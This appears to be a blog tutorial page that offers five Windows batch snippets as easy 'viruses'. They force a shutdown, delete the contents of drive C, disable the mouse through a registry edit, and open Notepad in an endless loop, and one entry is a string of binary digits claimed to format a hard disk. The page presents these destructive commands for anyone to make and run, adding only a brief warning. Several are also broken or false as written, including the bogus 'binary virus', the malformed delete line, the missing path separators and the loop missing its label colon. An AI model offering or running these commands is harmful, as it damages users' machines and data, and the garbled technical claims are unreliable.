How To Make Virus Easily

Are you looking for how to make a virus? I will show you some small virus programs that you can make by yourself using notepad.

Read Also: How To Make A Website: Step By Step Guide 2018

How to make a virus?

Every day new different virus come from various sources mainly from the internet. Most of the individual tries to make a new virus and experimenting with them to learn new things. If you are a beginner you can learn batch scripting. Well,  I have written five different types of virus that you can try.

1. virus that shut down your computer when clicking on that

1. open your notepad and copy the code given below

@echo off
shutdown.exe -s -t 3 -c “virus detected window shutdown”

2. save this as shutdown.bat (you can name it anything.bat, but .bat is must)

3. Now, running this file will shut down your computer/laptop.

Note: In the above code -s is for shutdown, t is for the time taken that you select for the shutdown, and c is for comment (you can type any comment of your choice)

2. Virus That Format Drive C:

1. open notepad and copy the code given below

@Echo off
Del C: *.* |y

2. Save this as virus.bat (you can name it anything.bat, but .bat is must)

3. Now, running this file will delete all the content of C Drive.

3. Creates the binary virus to format hard disk

1. copy and paste the code given below in notepad.

01001011000111110010010101010101010000011111100000

2. save the file as format.bat

3. You created a virus to format Hard Drive.

4. Program that disables mouse

1. open notepad and copy the code given below

rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

2. save this file as virus.bat

3. now you have created a virus which disables mouse.

5. Which Open Notepad Continuously Automatically

1. Open Notepad.
2. Paste the following code into the notepad.

@ECHO off
trick
START %SystemRoot%system32notepad.exe
GOTO trick

3. Now go to file and click on save as
4. Give any name with extension as .bat for Example – hackchefs.bat
5. Now go and click.

 

Warning: Please do not try to run on your own computer

 

For any help, you can leave a message on the Facebook page.

Share this

Leave a Comment

For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

I agree to these terms.